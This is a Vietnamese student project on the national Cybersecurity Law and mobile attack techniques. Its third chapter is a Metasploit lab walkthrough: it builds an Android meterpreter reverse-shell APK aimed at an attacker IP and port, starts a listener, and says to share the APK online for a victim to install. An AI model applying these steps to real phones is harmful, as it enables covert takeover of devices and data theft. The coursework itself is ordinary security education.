Đề tài tìm hiểu luật an ninh mạng việt nam và kỹ thuật tấn công trên điện thoại android

Mục đích, ý nghĩa của Luật An ninh mạng...3 Trang 5 DANH MỤC HÌNHHình 1.1 Cấu trúc hệ điều hành Android...4Hình 1.2 Cấu trúc Windows Phone...6Hình 3.1 tạo file apk...7Hình 3.2 giao diện

BỘ GIÁO DỤC VÀ ĐÀO TẠO TRƯỜNG ĐẠI HỌC KINH TẾ - TÀI CHÍNH

THÀNH PHỐ HỒ CHÍ MINH

ĐỒ ÁN CHUYÊN NGÀNH

Nghanh: Cong Nghe Thong Tin Chuyen nghanh: An toan thong tin

ĐỀ TÀI TÌM HIỂU LUẬT AN NINH MẠNG VIỆT NAM VÀ

KỸ THUẬT TẤN CÔNG TRÊN ĐIỆN THOẠI

ANDROID

Giảng viên hướng dẫn: TS Huỳnh Đệ Thủ

TP Hồ Chí Minh, năm 2024

BỘ GIÁO DỤC VÀ ĐÀO TẠO TRƯỜNG ĐẠI HỌC KINH TẾ - TÀI CHÍNH

THÀNH PHỐ HỒ CHÍ MINH

ĐỒ ÁN CHUYÊN NGÀNH Nghanh: Cong nghe thong tin Chuyen nghanh: An toan thong tin

ĐỀ TÀI TÌM HIỂU LUẬT AN NINH MẠNG VIỆT NAM VÀ

KỸ THUẬT TẤN CÔNG TRÊN ĐIỆN THOẠI

ANDROID

Giảng viên hướng dẫn: TS Huỳnh Đệ Thủ

Sinh viên thực hiện: Nguyễn Minh Tấn - 205051816

MỤC LỤC

MỤC LỤC 0

DANH MỤC HÌNH 1

Chương I: GIỚI THIỆU TỔNG QUAN VỀ AN NINH MẠNG 2

1.1 Giới thiệu An ninh mạng 2

1.2 Tình hình An ninh mạng Việt Nam 2

1.3 Tình hình An ninh mạng trên các thiết bị di động 3

1.4 Luật An ninh mạng là gì? Mục đích, ý nghĩa của Luật An ninh mạng 3

Chương II TÌM HIỂU MỘT SỐ KỸ THUẬT TẤN CÔNG THIẾT BỊ ĐIỆN THOẠI DI ĐỘNG 5

2.1 Hacking Android iOS 5

2.2 Hacking iOS 7

2.3 Hacking Windows Phone OS 7

2.4 Hacking BlackBerry 8

Chương III: MÔ PHỎNG KỸ THUẬT TẤN CÔNG NỀN TẢNG DI ĐỘNG ANDROID 9

3.1 Mô phỏng hacking Android OS 9

3.1.1 Chuẩn bị: 9

3.1.2 Thông tin ban đầu: 9

3.1.3 Các bước tiến hành: 9

3.2 Kết luận 13

Tài Liệu Tham Khảo 14

DANH MỤC HÌNH

Hình 1.1 Cấu trúc hệ điều hành Android 4

Hình 1.2 Cấu trúc Windows Phone 6

Hình 3.1 tạo file apk 7

Hình 3.2 giao diện Metasploit 8

Hình 3.3 sử dụng khai thác đa xử lý và cấu hình chuyển đổi các tải trọng Metasploit 9

Hình 3.5 Giao diện máy ảo chạy hệ điều hành android khi đã kích hoạt file apk 10

Hình 3.6 Máy tấn công đã nhận kết nối từ máy nạn nhân 10

Hình 3.7 Danh sách các thư mục trong máy điện thoại Android 11

Hình 3.8 Thực hiện download file apk trong thư mục download của máy Android 11

Chương I: GIỚI THIỆU TỔNG QUAN VỀ AN NINH MẠNG 1.1 Giới thiệu An ninh mạng.

 An ninh mạng “là sự bảo đảm hoạt động trên không gian mạng không gây phương hại đến an ninh quốc gia, trật tự, an toàn xã hội, quyền và lợi ích hợp pháp của cơ quan, tổ chức, cá nhân”

 An ninh mạng là lĩnh vực có nhiệm vụ bảo vệ các thông tin cá nhân và những hoạt động liên quan đến chiếc máy tính bằng cách phát hiện, ngăn chặn và ứng phó với các cuộc tấn công từ bên ngoài; bảo vệ hệ thống mạng không bị phá hoại về phần cứng hay chỉnh sửa dữ liệu; cung cấp giải pháp, chính sách bảo vệ máy tính, hệ thống mạng nhằm ngăn cản người dùng trái phép hay mã độc hại xâm nhập vào

 Các yếu tố cần bảo vệ:

- Dữ liệu

- Tài nguyên hệ thống

- Danh tiếng của dữ liệu khi bị đánh cắp

1.2 Tình hình An ninh mạng Việt Nam.

 Tình hình an toàn, an ninh mạng tại Việt Nam tiếp tục diễn biến phức tạp, tồn tại nhiều cơ sở gây nguy cơ bị tấn công, phá hoại hạ tầng mạng thông tin, ảnh hưởng tới an ninh quốc gia

 Ghi nhận năm 2022 có 11.213 cuộc tấn công mạng gây ra sự cố vào các hệ thống thông tin Trong số đó có hơn 3.900 cuộc tấn công Phishing (Tấn công giả mạo), hơn 1.500 cuộc tấn công Deface và gần 5.800 cuộc tấn công lây nhiễm mã độc malware Số cuộc tấn công mạng này tăng 44,2% so với cùng kỳ năm 2021

 Theo tổng hợp của Công ty Công nghệ An ninh mạng quốc Gia Việt Nam (NCS), năm 2023 đã ghi nhận 13.900 vụ tấn công mạng vào các tổ chức tại Việt Nam, trung bình mỗi tháng xảy ra 1.160 vụ, tăng 9,5% so với năm 2022 Các mục tiêu chịu nhiều cuộc tấn công nhất trong năm qua là các cơ quan chính phủ, hệ thống ngân hàng, tổ chức tài chính, hệ thống công nghiệp và các hệ thống trọng yếu khác

 Các cuộc tấn công chủ yếu đến từ:

- Tin nhắn rác

- Wifi miễn phí ở Việt Nam

- Làm máy tính nhiễm virus từ USB

- Các ứng dụng giã mạo trên di động

- Mã độc

PAGE \* MERGEFORMAT 2

- DDoS

1.3 Tình hình An ninh mạng trên các thiết bị di động.

 Trong những năm gần đây, sự phổ biến của các thiết bị di động như điện thoại thông minh và máy tính bảng đã mang lại cho người dùng nhiều tiện ích và khả năng dễ dàng sử dụng kết nối Internet mọi lúc, mọi nơi Theo số liệu của Liên minh Viễn thông Quốc tế (ITU) đưa ra tại thông cáo báo chí “Sự kiện và số liệu 2022” cho thấy, tính đến cuối năm 2022, gần 3/4 dân số toàn cầu từ 10 tuổi trở lên (ước khoảng 73% dân số) sở hữu điện thoại di động

 Tuy nhiên, việc sử dụng nhiều các thiết bị di động cũng làm gia tăng các cuộc tấn công mạng, bởi đây là một trong những liên kết yếu nhất trong cơ sở hạ tầng công nghệ thông tin của hầu hết các tổ chức, doanh nghiệp Việc nhận thức rõ những mối đe dọa về an toàn đối với thiết bị di động sẽ giúp người dùng cá nhân và tổ chức tìm được các biện pháp đảm bảo an ninh an toàn trong môi trường di động

 Theo các chuyên gia bảo mật, những vi phạm an toàn thiết bị di động sẽ còn gia tăng trong thời gian tới, tiếp tục khiến cho những nguy cơ mất an toàn thông tin từ chính các thiết bị di động trở nên nguy hiểm hơn Vì thế ở góc độ người dùng, nhất

là các tổ chức, doanh nghiệp cần phải nhận diện được các mối đe dọa đối với thiết

bị di động để tận dụng được lợi ích từ thiết bị di động nhưng vẫn đảm bảo vấn đề

an toàn cho hoạt động của mình Cụ thể, các mối đe dọa trên thiết bị di động có thể được chia thành nhiều loại như các mối đe dọa từ vật lý, mạng, hệ thống và ứng dụng

1.4 Luật An ninh mạng là gì? Mục đích, ý nghĩa của Luật An ninh mạng.

 Luật An ninh mạng gồm 7 chương, 43 điều, quy định những nội cơ bản về bảo vệ

an ninh mạng đối với hệ thống thông tin quan trọng về an ninh quốc gia; phòng ngừa, xử lý hành vi xâm phạm an ninh mạng; triển khai hoạt động bảo vệ an ninh mạng và quy định trách nhiệm của cơ quan, tổ chức, cá nhân

 Những điều bị cấm trong Luật An ninh mạng Theo quy định trong Luật An ninh mạng, có nhiều hành vi bị cấm trên không gian mạng, bao gồm:

- Đăng tải, phát tán thông tin trên không gian mạng có nội dung tuyên truyền chống Nhà nước Cộng hòa xã hội chủ nghĩa Việt Nam

- Kích động gây bạo loạn, phá rối an ninh, gây rối trật tự công cộng

- Đăng tải thông tin có nội dung làm nhục, vu khống người khác

- Đăng tải thông tin có nội dung xâm phạm trật tự quản lý kinh tế

- Chiếm đoạt tài sản

- Tổ chức đánh bạc, đánh bạc qua mạng internet,…

 Nếu cá nhân, tổ chức sản xuất, đưa vào sử dụng công cụ, phương tiện, phần mềm hoặc có hành vi cản trở, gây rối loạn hoạt động của mạng máy tính, mạng viễn

thông; phát tán chương trình tin học gây hại cho hoạt động của mạng máy tính, mạng viễn thông, phương tiện điện tử; xâm nhập trái phép vào mạng máy tính, mạng viễn thông hoặc phương tiện điện tử của người khác, cũng sẽ bị xử lý

 Mục đích của Luật An ninh mạng:

- Hoàn thiện cơ sở pháp lý ổn định về an ninh mạng theo hướng áp dụng các quy định pháp luật một cách đồng bộ, khả thi trong thực tiễn thi hành

- Phát huy các nguồn lực của đất nước để bảo đảm an ninh mạng, phát triển lĩnh vực an ninh mạng đáp ứng yêu cầu phát triển kinh tế – xã hội, quốc phòng, an ninh, góp phần nâng cao chất lượng cuộc sống của nhân dân và bảo đảm quốc phòng, an ninh

- Bảo vệ chủ quyền, lợi ích, an ninh quốc gia, quyền và lợi ích hợp pháp của tổ chức, cá nhân tham gia hoạt động trên không gian mạng, xây dựng môi trường không gian mạng lành mạnh

- Nâng cao năng lực tự chủ về an ninh mạng, hoàn thiện chính sách nghiên cứu, phát triển chiến lược, chia sẻ thông tin về an ninh mạng

- Mở rộng hợp tác quốc tế về an ninh mạng trên cơ sở tôn trọng độc lập, chủ quyền, bình đẳng, cùng có lợi, phù hợp với pháp luật trong nước và điều ước quốc tế mà nước ta tham gia ký kết

 Ý nghĩa của Luật An ninh mạng:

- Hệ thống thông tin của cơ quan, tổ chức, cá nhân được bảo vệ trước hoạt động tấn công mạng theo quy định của Luật An ninh mạng

- Các hệ thống thông tin quan trọng về an ninh quốc gia được bảo vệ tương xứng với tầm quan trọng đối với an ninh quốc gia, trật tự an toàn

xã hội

- Quyền và lợi ích hợp pháp của tổ chức, cá nhân được bảo vệ trước các hành vi tấn công mạng

- Luật An ninh mạng cũng quy định cụ thể cơ chế phối hợp phòng, chống tấn công mạng của các bộ, ngành chức năng, xác định trách nhiệm

cụ thể của Bộ Công an, Bộ Quốc phòng, Ban Cơ yếu Chính phủ trong phòng, chống tấn công mạng

PAGE \* MERGEFORMAT 2

Chương II TÌM HIỂU MỘT SỐ KỸ THUẬT TẤN CÔNG

THIẾT BỊ ĐIỆN THOẠI DI ĐỘNG 2.1 Hacking Android iOS.

 Android là một đống phần mềm được phát triển bởi Google riêng cho thiết bị

di động như điện thoại thông minh và máy tính bảng Nó bao gồm một hệ thống điều hành, middleware và các ứng dụng quan trọng hệ điều hành di động Android được dựa trên nhân Linux Các ứng dụng Android chạy trong một sandbox

 Các tính năng của hệ điều hành Android bao gồm:

- Khung ứng dụng cho phép tái sử dụng và thay thế linh kiện

- Máy ảo Dalvik được tối ưu hóa cho các thiết bị di động

- Tích hợp trình duyệt dựa trên các công cụ WebKit mã nguồn mở

- SQLite để lưu trữ dữ liệu © Truyền thông hỗ trợ cấu trúc cho âm thanh phổ biến, video, và vẫn còn các định dạng hình ảnh (MPEG4, H.264, MP3, AAC, AMR, JPG, PNG, GIF)

- Môi trường phát triển phong phú bao gồm một trình giả lập thiết bị, công cụ để gỡ lỗi, bộ nhớ và hiệu suất profiling, và một plugin cho Eclipse IDE

 Cấu trúc hệ điều hành Android:

Hình 1.1 Cấu trúc hệ điều hành Android

PAGE \* MERGEFORMAT 2

Một số kĩ thuật tấn công Thiết bị di động Android:

2.2 Hacking iOS.

Kĩ thuật tấn công Thiết bị di động iOS:

 Jailbreaking là một phương pháp của việc kiểm soát của hệ điều hành iOS được sử dụng trên các thiết bị của Apple Nó làm giãn các thiết bị từ những rào cản của sự phụ thuộc vào các ứng dụng mã nguồn độc quyền của Apple và cho phép người dùng sử dụng các ứng dụng của bên thứ ba không có sẵn tại các cửa hàng ứng dụng chính thức Nó được thực hiện bằng cách cài đặt một bộ sửa đổi của các bản vá lỗi kernel cho phép bạn chạy các ứng dụng của bên thứ ba không

có chữ ký của các nhà cung cấp hệ điều hành Nó được sử dụng để thêm nhiều chức năng hơn cho các tiện ích của Apple chuẩn Nó cũng có thể cung cấp quyền truy cập root vào hệ thống điều hành và cho phép tải về các ứng dụng của bên thứ

ba, chủ đề, phần mở rộng, vv Điều này loại bỏ các hạn chế sandbox, cho phép các ứng dụng độc hại để truy cập tài nguyên di động hạn chế và thông tin

 Khi Jailbreak sẽ hình thành rủi ro khác cho thiết bị của bạn bao gồm:

- Bãi bỏ bảo hành của điện thoại của bạn

- Hiệu suất kém

- Bricking thiết bị

- Nhiễm phần mềm độc hại

2.3 Hacking Windows Phone OS.

 Windows Phone 8 là hệ điều hành thế hệ thứ hai được phát triển bởi Microsoft cho Windows Phone

 Đặc điểm quan trọng của Windows Phone 8:

- Nó cho phép các thiết bị có màn hình lớn hơn và bộ vi xử lý đa lõi lên tới 64 lõi

- Thành phần cốt lõi của Windows 8, bao gồm cả hạt nhân, hệ thống tập tin, trình điều khiển, mạng stack, các thành phần an ninh, phương tiện truyền thông và hỗ trợ đồ họa

- Internet Explorer 10, công nghệ bản đồ của Nokia, và nền đa nhiệm

- Hỗ trợ mã nguồn gốc (C và C ++), đơn giản hóa porting từ các nền tảng như Android, Symbian, và iOS

- Nhà cung cấp kiểm soát và xây dựng thương hiệu của nguyên tố "ví tiền" là có thể thông qua SIM hoặc phần cứng điện thoại

- Unified Extensible Firmware Interface (UEFI) giao thức khởi động

an toàn và Firmware qua mạng không cho cập nhật Windows Phone

- Cải thiện hỗ trợ cho lưu trữ di động và chia sẽ tin cậy

Hình 1.2 Cấu trúc Windows Phone

2.4 Hacking BlackBerry.

 BlackBerry OS là một hệ điều hành điện thoại di động độc quyền được phát triển bởi Research In Motion (RIM) cho dòng BlackBerry của điện thoại thông minh và các thiết bị cầm tay

 Để tấn công hệ điều hành BlackBerry chúng ta sẽ khai thác Dịch Vụ Tin Nhắn Ngắn - Short Message Service (SMS)

 Một số kỹ thuật như:

- SMS Backdoor

- Khai thác Email

- Phần mềm gián điệp FinSpy Mobile

PAGE \* MERGEFORMAT 2

Chương III:

MÔ PHỎNG KỸ THUẬT TẤN CÔNG NỀN TẢNG DI ĐỘNG

ANDROID 3.1 Mô phỏng hacking Android OS.

3.1.1 Chuẩn bị:

+ 1 máy ảo cài hệ điều hành kali linux

+ 1 máy cài android

3.1.2 Thông tin ban đầu:

+ Địa chỉ IP máy tấn công

+ Cổng nhận kết nối

3.1.3 Các bước tiến hành:

Bước 1: trong cửa sổ terminal của máy ảo kali linux tạo 1 file files.apk

Bằng lệnh “msfpayload android/merterpreter/reverse_tcp lhost = <Địa chỉ IP của

máy tấn công> lport <Cổng nhận kết nối > R > < tên file apk>”

(sử dụng khung tải trọng Metasploit để khai thác)

Hình 3.1 tạo file apk.

Bước 2: Gõ msfconsole đến đến giao diện điều khiển Metasploit

Hình 3.2 giao diện Metasploit

Bước 3: Vì tải trọng ban đầu là reverse_tcp nơi kẻ tấn công mong đợi các nạn nhân để kết nối với máy tấn công,máy tấn công phải thiết lập xử lý để xử lý những kết nối vào cổng đã được quy định ở trên

Gõ lệnh :

Use exploit/multi/handler ( sử dụng bộ xử lý Metasploit , khai thác đa xử lý)

Set payload android/meterpreter/reverse_tcp ( Đảm bảo tải trọng trùng với bước 1 ) Bước 4: Cấu hình chuyển đổi cho các tải trọng Metasploit , đã xác định trong bước 3

Gõ lệnh:

Set lhost (Địa chỉ IP máy tấn công)

Set lport (Cổng lắng nghe các kết nối đảo ngược)

Exploit (Bắt đầu lắng nghe kết nối)

PAGE \* MERGEFORMAT 2

Hình 3.3 sử dụng khai thác đa xử lý và cấu hình chuyển đổi các tải trọng Metasploit

Bước 5: Chia sẽ file với đuôi apk vừa tạo lên internet để cho máy nạn nhân tải và cài vào máy

Hình 3.5 Giao diện máy ảo chạy hệ điều hành android khi đã kích hoạt file apk

Hình 3.6 Máy tấn công đã nhận kết nối từ máy nạn nhân

Tới đây máy tấn công đã được bên trong nạn nhân là điện thoại android , có thể làm mọi thứ với điện thoại của nạn nhân.

PAGE \* MERGEFORMAT 2

Hình 3.7 Danh sách các thư mục trong máy điện thoại Android.

Hình 3.8 Thực hiện download file apk trong thư mục download của máy Android

3.2 Kết luận

 Một là, sự phát triển của mạng xã hội góp phần quan trọng pháttriển kinh tế – xã hội, song cũng tạo môi trường thuận lợi cho các hoạt động tác động, chuyển hóa chính trị, khủng bố

 Hai là, sự phát triển của trí tuệ nhân tạo đã và đang tạo ra những thành tựu khoa học công nghệ vượt trội, đóng vai trò ngày càng quan trọng trong nhiều lĩnh vực của đời sống xã hội nhưng cũng được dự báo sẽ gây nên “thảm họa” nếu không được kiểm soát chặt chẽ

 Ba là, các thiết bị kết nối internet ngày càng phổ biến không chỉ mang lại những lợi ích to lớn cho cuộc sống con người, phát triển kinh tế – xã hội, bảo đảm quốc phòng – an ninh mà còn có thể bị sử dụng để tiến hành các cuộc tấn công mạng quy mô lớn

 Bốn là, các cuộc tấn công mạng có chủ đích (Advanced Peristent Threat – APT) không chỉ có thể phá hoại các mục tiêu, công trình quan trọng về an ninh quốc gia

mà còn chiếm đoạt thông tin, tài liệu bí mật, chiếm đoạt để sử dụng các hệ thống

dữ liệu lớn, dữ liệu nhanh phục vụ các ý chính trị và hoạt động phạm tội

 Thực trạng, nguy cơ trên đã đặt ra yêu cầu bức thiết phải xây dựng và ban hành văn bản luật về an ninh mạng để phòng ngừa, đấu tranh, xử lý các hành vi sử dụng không gian mạng xâm phạm an ninh quốc gia, trật tự an toàn xã hội, quyền và lợi ích hợp pháp của tổ chức, cá nhân

 Không nên cài đặt file Apk từ nguồn không rõ